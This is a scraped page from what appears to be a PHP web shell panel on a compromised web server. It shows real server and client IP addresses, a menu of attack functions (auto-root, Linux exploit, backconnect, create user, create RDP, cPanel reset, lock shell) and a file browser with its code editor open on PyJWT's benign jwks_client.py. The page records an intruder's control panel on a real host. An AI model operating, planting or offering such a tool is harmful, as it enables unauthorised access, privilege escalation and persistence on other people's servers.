Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.219.176.215
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
python38 /
lib /
python3.8 /
site-packages /
jwt /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
1.52
KB
-rw-r--r--
algorithms.py
20.97
KB
-rw-r--r--
api_jwk.py
2.87
KB
-rw-r--r--
api_jws.py
7.65
KB
-rw-r--r--
api_jwt.py
7.13
KB
-rw-r--r--
exceptions.py
965
B
-rw-r--r--
help.py
1.57
KB
-rw-r--r--
jwks_client.py
1.88
KB
-rw-r--r--
py.typed
0
B
-rw-r--r--
utils.py
2.45
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : jwks_client.py
import json import urllib.request from functools import lru_cache from typing import Any, List from .api_jwk import PyJWK, PyJWKSet from .api_jwt import decode_complete as decode_token from .exceptions import PyJWKClientError class PyJWKClient: def __init__(self, uri: str, cache_keys: bool = True, max_cached_keys: int = 16): self.uri = uri if cache_keys: # Cache signing keys # Ignore mypy (https://github.com/python/mypy/issues/2427) self.get_signing_key = lru_cache(maxsize=max_cached_keys)(self.get_signing_key) # type: ignore def fetch_data(self) -> Any: with urllib.request.urlopen(self.uri) as response: return json.load(response) def get_jwk_set(self) -> PyJWKSet: data = self.fetch_data() return PyJWKSet.from_dict(data) def get_signing_keys(self) -> List[PyJWK]: jwk_set = self.get_jwk_set() signing_keys = [] for jwk_set_key in jwk_set.keys: if jwk_set_key.public_key_use == "sig" and jwk_set_key.key_id: signing_keys.append(jwk_set_key) if len(signing_keys) == 0: raise PyJWKClientError("The JWKS endpoint did not contain any signing keys") return signing_keys def get_signing_key(self, kid: str) -> PyJWK: signing_keys = self.get_signing_keys() signing_key = None for key in signing_keys: if key.key_id == kid: signing_key = key break if not signing_key: raise PyJWKClientError( f'Unable to find a signing key that matches: "{kid}"' ) return signing_key def get_signing_key_from_jwt(self, token: str) -> PyJWK: unverified = decode_token(token, options={"verify_signature": False}) header = unverified["header"] return self.get_signing_key(header.get("kid"))
Close